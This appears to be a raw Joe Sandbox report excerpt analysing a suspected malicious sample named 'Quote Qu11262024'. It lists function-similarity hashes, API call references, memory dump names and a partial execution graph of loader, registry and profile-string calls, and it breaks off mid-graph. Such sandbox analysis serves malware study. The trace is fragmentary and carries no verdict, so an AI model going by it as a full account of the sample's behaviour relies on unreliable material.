                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
                                                                                                    • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                    • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 726966127-0
                                                                                                    • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                    • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040B224
                                                                                                    • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 726966127-0
                                                                                                    • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                    • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 231171946-0
                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3669619086-0
                                                                                                    • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                    • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2605342592-0
                                                                                                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1961120804-0
                                                                                                    • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                    • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.4%
                                                                                                    Dynamic/Decrypted Code Coverage:19.8%
                                                                                                    Signature Coverage:0.5%
                                                                                                    Total number of Nodes:867
                                                                                                    Total number of Limit Nodes:22
                                                                                                    execution_graph 34111 40fc40 70 API calls 34285 403640 21 API calls 34112 427fa4 42 API calls 34286 412e43 _endthreadex 34287 425115 76 API calls __fprintf_l 34288 43fe40 133 API calls 34115 425115 83 API calls __fprintf_l 34116 401445 memcpy memcpy DialogBoxParamA 34117 440c40 34 API calls 34119 411853 RtlInitializeCriticalSection memset 34120 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34294 40a256 13 API calls 34296 432e5b 17 API calls 34298 43fa5a 20 API calls 34122 401060 41 API calls 34301 427260 CloseHandle memset memset 33181 410c68 FindResourceA 33182 410c81 SizeofResource 33181->33182 33184 410cae 33181->33184 33183 410c92 LoadResource 33182->33183 33182->33184 33183->33184 33185 410ca0 LockResource 33183->33185 33185->33184 34303 405e69 14 API calls 34127 433068 15 API calls __fprintf_l 34305 414a6d 18 API calls 34306 43fe6f 134 API calls 34129 424c6d 15 API calls __fprintf_l 34307 426741 19 API calls 34131 440c70 17 API calls 34132 443c71 44 API calls 34135 427c79 24 API calls 34310 416e7e memset __fprintf_l 34139 42800b 47 API calls 34140 425115 85 API calls __fprintf_l 34313 41960c 61 API calls 34141 43f40c 122 API calls __fprintf_l 34144 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34145 43f81a 20 API calls 34147 414c20 memset memset 34148 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34317 414625 18 API calls 34318 404225 modf 34319 403a26 strlen WriteFile 34321 40422a 12 API calls 34325 427632 memset memset memcpy 34326 40ca30 59 API calls 34327 404235 26 API calls 34149 42ec34 61 API calls __fprintf_l 34150 425115 76 API calls __fprintf_l 34328 425115 77 API calls __fprintf_l 34330 44223a 38 API calls 34156 43183c 112 API calls 34331 44b2c5 _onexit __dllonexit 34336 42a6d2 memcpy __allrem 34158 405cda 65 API calls 34344 43fedc 138 API calls 34345 4116e1 16 API calls __fprintf_l 34161 4244e6 19 API calls 34163 42e8e8 127 API calls __fprintf_l 34164 4118ee RtlLeaveCriticalSection 34350 43f6ec 22 API calls 34166 425115 119 API calls __fprintf_l 33171 410cf3 EnumResourceNamesA 34353 4492f0 memcpy memcpy 34355 43fafa 18 API calls 34357 4342f9 15 API calls __fprintf_l 34167 4144fd 19 API calls 34359 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34360 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34363 443a84 _mbscpy 34365 43f681 17 API calls 34170 404487 22 API calls 34367 415e8c 16 API calls __fprintf_l 34174 411893 RtlDeleteCriticalSection __fprintf_l 34175 41a492 42 API calls 34371 403e96 34 API calls 34372 410e98 memset SHGetPathFromIDList SendMessageA 34177 426741 109 API calls __fprintf_l 34178 4344a2 18 API calls 34179 4094a2 10 API calls 34181 4108a4 7 API calls 34375 4116a6 15 API calls __fprintf_l 34376 43f6a4 17 API calls 34377 440aa3 20 API calls 34379 427430 45 API calls 34183 4090b0 7 API calls 34184 4148b0 15 API calls 34186 4118b4 RtlEnterCriticalSection 34187 4014b7 CreateWindowExA 34188 40c8b8 19 API calls 34190 4118bf RtlTryEnterCriticalSection 34384 42434a 18 API calls __fprintf_l 34386 405f53 12 API calls 34198 43f956 59 API calls 34200 40955a 17 API calls 34201 428561 36 API calls 34202 409164 7 API calls 34390 404366 19 API calls 34394 40176c ExitProcess 34397 410777 42 API calls 34207 40dd7b 51 API calls 34208 425d7c 16 API calls __fprintf_l 34399 43f6f0 25 API calls 34400 42db01 22 API calls 34209 412905 15 API calls __fprintf_l 34401 403b04 54 API calls 34402 405f04 SetDlgItemTextA GetDlgItemTextA 34403 44b301 ??3@YAXPAX 34406 4120ea 14 API calls 3 library calls 34407 40bb0a 8 API calls 34409 413f11 strcmp 34213 434110 17 API calls __fprintf_l 34216 425115 108 API calls __fprintf_l 34410 444b11 _onexit 34218 425115 76 API calls __fprintf_l 34221 429d19 10 API calls 34413 444b1f __dllonexit 34414 409f20 _strcmpi 34223 42b927 31 API calls 34417 433f26 19 API calls __fprintf_l 34418 44b323 FreeLibrary 34419 427f25 46 API calls 34420 43ff2b 17 API calls 34421 43fb30 19 API calls 34230 414d36 16 API calls 34232 40ad38 7 API calls 34423 433b38 16 API calls __fprintf_l 34102 44b33b 34103 44b344 ??3@YAXPAX 34102->34103 34104 44b34b 34102->34104 34103->34104 34105 44b354 ??3@YAXPAX 34104->34105 34106 44b35b 34104->34106 34105->34106 34107 44b364 ??3@YAXPAX 34106->34107 34108 44b36b 34106->34108 34107->34108 34109 44b374 ??3@YAXPAX 34108->34109 34110 44b37b 34108->34110 34109->34110 34236 426741 21 API calls 34237 40c5c3 125 API calls 34239 43fdc5 17 API calls 34424 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34242 4161cb memcpy memcpy memcpy memcpy 33186 44b3cf 33187 44b3e6 33186->33187 33192 44b454 33186->33192 33187->33192 33199 44b40e GetModuleHandleA 33187->33199 33189 44b45d GetModuleHandleA 33193 44b467 33189->33193 33190 44b49a 33212 44b49f 33190->33212 33192->33189 33192->33190 33192->33193 33193->33192 33194 44b487 GetProcAddress 33193->33194 33194->33192 33195 44b405 33195->33192 33195->33193 33196 44b428 GetProcAddress 33195->33196 33196->33192 33197 44b435 VirtualProtect 33196->33197 33197->33192 33198 44b444 VirtualProtect 33197->33198 33198->33192 33200 44b417 33199->33200 33202 44b454 33199->33202 33231 44b42b GetProcAddress 33200->33231 33204 44b45d GetModuleHandleA 33202->33204 33205 44b49a 33202->33205 33211 44b467 33202->33211 33203 44b41c 33203->33202 33207 44b428 GetProcAddress 33203->33207 33204->33211 33206 44b49f 771 API calls 33205->33206 33206->33205 33207->33202 33208 44b435 VirtualProtect 33207->33208 33208->33202 33209 44b444 VirtualProtect 33208->33209 33209->33202 33210 44b487 GetProcAddress 33210->33202 33211->33202 33211->33210 33213 444c4a 33212->33213 33214 444c56 GetModuleHandleA 33213->33214 33215 444c68 __set_app_type __p__fmode __p__commode 33214->33215 33217 444cfa 33215->33217 33218 444d02 __setusermatherr 33217->33218 33219 444d0e 33217->33219 33218->33219 33240 444e22 _controlfp 33219->33240 33221 444d13 _initterm __getmainargs _initterm 33222 444d6a GetStartupInfoA 33221->33222 33224 444d9e GetModuleHandleA 33222->33224 33241 40cf44 33224->33241 33228 444dcf _cexit 33230 444e04 33228->33230 33229 444dc8 exit 33229->33228 33230->33190 33232 44b454 33231->33232 33233 44b435 VirtualProtect 33231->33233 33235 44b45d GetModuleHandleA 33232->33235 33236 44b49a 33232->33236 33233->33232 33234 44b444 VirtualProtect 33233->33234 33234->33232 33239 44b467 33235->33239 33237 44b49f 771 API calls 33236->33237 33237->33236 33238 44b487 GetProcAddress 33238->33239 33239->33232 33239->33238 33240->33221 33292 404a99 LoadLibraryA 33241->33292 33243 40cf60 33278 40cf64 33243->33278 33300 410d0e 33243->33300 33245 40cf6f 33304 40ccd7 ??2@YAPAXI 33245->33304 33247 40cf9b 33318 407cbc 33247->33318 33252 40cfc4 33336 409825 memset 33252->33336 33253 40cfd8 33341 4096f4 memset 33253->33341 33258 40d181 ??3@YAXPAX 33260 40d1b3 33258->33260 33261 40d19f DeleteObject 33258->33261 33259 407e30 _strcmpi 33262 40cfee 33259->33262 33365 407948 free free 33260->33365 33261->33260 33264 40cff2 RegDeleteKeyA 33262->33264 33265 40d007 EnumResourceTypesA 33262->33265 33264->33258 33267 40d02f MessageBoxA 33265->33267 33270 40d047 33265->33270 33266 40d1c4 33366 4080d4 free 33266->33366 33267->33258 33269 40d0a0 CoInitialize 33363 40cc26 strncat memset RegisterClassA CreateWindowExA 33269->33363 33270->33269 33346 40ce70 33270->33346 33272 40d1cd 33367 407948 free free 33272->33367 33274 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33364 40c256 PostMessageA 33274->33364 33278->33228 33278->33229 33279 40d061 ??3@YAXPAX 33279->33260 33282 40d084 DeleteObject 33279->33282 33280 40d09e 33280->33269 33282->33260 33284 40d0f9 GetMessageA 33285 40d17b CoUninitialize 33284->33285 33286 40d10d 33284->33286 33285->33258 33287 40d113 TranslateAccelerator 33286->33287 33289 40d145 IsDialogMessage 33286->33289 33290 40d139 IsDialogMessage 33286->33290 33287->33286 33288 40d16d GetMessageA 33287->33288 33288->33285 33288->33287 33289->33288 33291 40d157 TranslateMessage DispatchMessageA 33289->33291 33290->33288 33290->33289 33291->33288 33293 404ac4 GetProcAddress 33292->33293 33294 404aec 33292->33294 33295 404ad4 33293->33295 33296 404add FreeLibrary 33293->33296 33298 404b13 33294->33298 33299 404afc MessageBoxA 33294->33299 33295->33296 33296->33294 33297 404ae8 33296->33297 33297->33294 33298->33243 33299->33243 33301 410d17 LoadLibraryA 33300->33301 33302 410d3c 33300->33302 33301->33302 33303 410d2b GetProcAddress 33301->33303 33302->33245 33303->33302 33305 40cd08 ??2@YAPAXI 33304->33305 33307 40cd26 33305->33307 33308 40cd2d 33305->33308 33375 404025 6 API calls 33307->33375 33310 40cd66 33308->33310 33311 40cd59 DeleteObject 33308->33311 33368 407088 33310->33368 33311->33310 33313 40cd6b 33371 4019b5 33313->33371 33316 4019b5 strncat 33317 40cdbf _mbscpy 33316->33317 33317->33247 33377 407948 free free 33318->33377 33322 407a1f malloc memcpy free free 33325 407cf7 33322->33325 33323 407ddc 33331 407e04 33323->33331 33390 407a1f 33323->33390 33325->33322 33325->33323 33326 407d7a free 33325->33326 33325->33331 33381 40796e 7 API calls 33325->33381 33382 406f30 33325->33382 33326->33325 33378 407a55 33331->33378 33332 407e30 33333 407e57 33332->33333 33334 407e38 33332->33334 33333->33252 33333->33253 33334->33333 33335 407e41 _strcmpi 33334->33335 33335->33333 33335->33334 33396 4097ff 33336->33396 33338 409854 33401 409731 33338->33401 33342 4097ff 3 API calls 33341->33342 33343 409723 33342->33343 33421 40966c 33343->33421 33435 4023b2 33346->33435 33352 40ced3 33524 40cdda 7 API calls 33352->33524 33353 40cece 33356 40cf3f 33353->33356 33476 40c3d0 memset GetModuleFileNameA strrchr 33353->33476 33356->33279 33356->33280 33359 40ceed 33503 40affa 33359->33503 33363->33274 33364->33284 33365->33266 33366->33272 33367->33278 33376 406fc7 memset _mbscpy 33368->33376 33370 40709f CreateFontIndirectA 33370->33313 33372 4019e1 33371->33372 33373 4019c2 strncat 33372->33373 33374 4019e5 memset LoadIconA 33372->33374 33373->33372 33374->33316 33375->33308 33376->33370 33377->33325 33379 407a65 33378->33379 33380 407a5b free 33378->33380 33379->33332 33380->33379 33381->33325 33383 406f37 malloc 33382->33383 33384 406f7d 33382->33384 33386 406f73 33383->33386 33387 406f58 33383->33387 33384->33325 33386->33325 33388 406f6c free 33387->33388 33389 406f5c memcpy 33387->33389 33388->33386 33389->33388 33391 407a38 33390->33391 33392 407a2d free 33390->33392 33393 406f30 3 API calls 33391->33393 33394 407a43 33392->33394 33393->33394 33395 40796e 7 API calls 33394->33395 33395->33331 33412 406f96 GetModuleFileNameA 33396->33412 33398 409805 strrchr 33399 409814 33398->33399 33400 409817 _mbscat 33398->33400 33399->33400 33400->33338 33413 44b090 33401->33413 33406 40930c 3 API calls 33407 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33406->33407 33408 4097c5 LoadStringA 33407->33408 33409 4097db 33408->33409 33409->33408 33411 4097f3 33409->33411 33420 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33409->33420 33411->33258 33412->33398 33414 40973e _mbscpy _mbscpy 33413->33414 33415 40930c 33414->33415 33416 44b090 33415->33416 33417 409319 memset GetPrivateProfileStringA 33416->33417 33418 409374 33417->33418 33419 409364 WritePrivateProfileStringA 33417->33419 33418->33406 33419->33418 33420->33409 33431 406f81 GetFileAttributesA 33421->33431 33423 409675 33424 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33423->33424 33430 4096ee 33423->33430 33432 409278 GetPrivateProfileStringA 33424->33432 33426 4096c9 33433 409278 GetPrivateProfileStringA 33426->33433 33428 4096da 33434 409278 GetPrivateProfileStringA 33428->33434 33430->33259 33431->33423 33432->33426 33433->33428 33434->33430 33526 409c1c 33435->33526 33438 401e69 memset 33565 410dbb 33438->33565 33441 401ec2 33595 4070e3 strlen _mbscat _mbscpy _mbscat 33441->33595 33442 401ed4 33580 406f81 GetFileAttributesA 33442->33580 33445 401ee6 strlen strlen 33447 401f15 33445->33447 33448 401f28 33445->33448 33596 4070e3 strlen _mbscat _mbscpy _mbscat 33447->33596 33581 406f81 GetFileAttributesA 33448->33581 33451 401f35 33582 401c31 33451->33582 33454 401f75 33594 410a9c RegOpenKeyExA 33454->33594 33456 401c31 7 API calls 33456->33454 33457 401f91 33458 402187 33457->33458 33459 401f9c memset 33457->33459 33461 402195 ExpandEnvironmentStringsA 33458->33461 33462 4021a8 _strcmpi 33458->33462 33597 410b62 RegEnumKeyExA 33459->33597 33606 406f81 GetFileAttributesA 33461->33606 33462->33352 33462->33353 33464 40217e RegCloseKey 33464->33458 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33474 401fc9 33465->33474 33598 410b1e 33466->33598 33469 402165 33469->33464 33470 406f81 GetFileAttributesA 33470->33474 33471 402076 memset memset strlen strlen 33471->33474 33472 4070e3 strlen _mbscat _mbscpy _mbscat 33472->33474 33473 4020dd strlen strlen 33473->33474 33474->33464 33474->33465 33474->33469 33474->33470 33474->33471 33474->33472 33474->33473 33475 402167 _mbscpy 33474->33475 33605 410b62 RegEnumKeyExA 33474->33605 33475->33464 33477 40c422 33476->33477 33478 40c425 _mbscat _mbscpy _mbscpy 33476->33478 33477->33478 33479 40c49d 33478->33479 33480 40c512 33479->33480 33481 40c502 GetWindowPlacement 33479->33481 33482 40c538 33480->33482 33627 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33480->33627 33481->33480 33620 409b31 33482->33620 33486 40ba28 33487 40ba87 33486->33487 33493 40ba3c 33486->33493 33630 406c62 LoadCursorA SetCursor 33487->33630 33489 40ba8c 33631 4107f1 33489->33631 33634 403c16 33489->33634 33710 410a9c RegOpenKeyExA 33489->33710 33711 404734 33489->33711 33719 404785 33489->33719 33490 40ba43 _mbsicmp 33490->33493 33491 40baa0 33492 407e30 _strcmpi 33491->33492 33496 40bab0 33492->33496 33493->33487 33493->33490 33722 40b5e5 10 API calls 33493->33722 33494 40bafa SetCursor 33494->33359 33496->33494 33497 40baf1 qsort 33496->33497 33497->33494 34077 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33503->34077 33505 40b00e 33506 40b016 33505->33506 33507 40b01f GetStdHandle 33505->33507 34078 406d1a CreateFileA 33506->34078 33509 40b01c 33507->33509 33510 40b035 33509->33510 33511 40b12d 33509->33511 34079 406c62 LoadCursorA SetCursor 33510->34079 34083 406d77 9 API calls 33511->34083 33514 40b136 33525 40c580 28 API calls 33514->33525 33515 40b087 33516 40b0a1 33515->33516 34081 40a699 12 API calls 33515->34081 33520 40b0d6 33516->33520 34082 406d77 9 API calls 33516->34082 33517 40b042 33517->33515 33517->33516 34080 40a57c strlen WriteFile 33517->34080 33521 40b116 CloseHandle 33520->33521 33522 40b11f SetCursor 33520->33522 33521->33522 33522->33514 33524->33353 33525->33356 33538 409a32 33526->33538 33529 409c80 memcpy memcpy 33530 409cda 33529->33530 33530->33529 33531 409d18 ??2@YAPAXI ??2@YAPAXI 33530->33531 33535 408db6 12 API calls 33530->33535 33532 409d54 ??2@YAPAXI 33531->33532 33534 409d8b 33531->33534 33532->33534 33548 409b9c 33534->33548 33535->33530 33537 4023c1 33537->33438 33539 409a44 33538->33539 33540 409a3d ??3@YAXPAX 33538->33540 33541 409a52 33539->33541 33542 409a4b ??3@YAXPAX 33539->33542 33540->33539 33543 409a63 33541->33543 33544 409a5c ??3@YAXPAX 33541->33544 33542->33541 33545 409a83 ??2@YAPAXI ??2@YAPAXI 33543->33545 33546 409a73 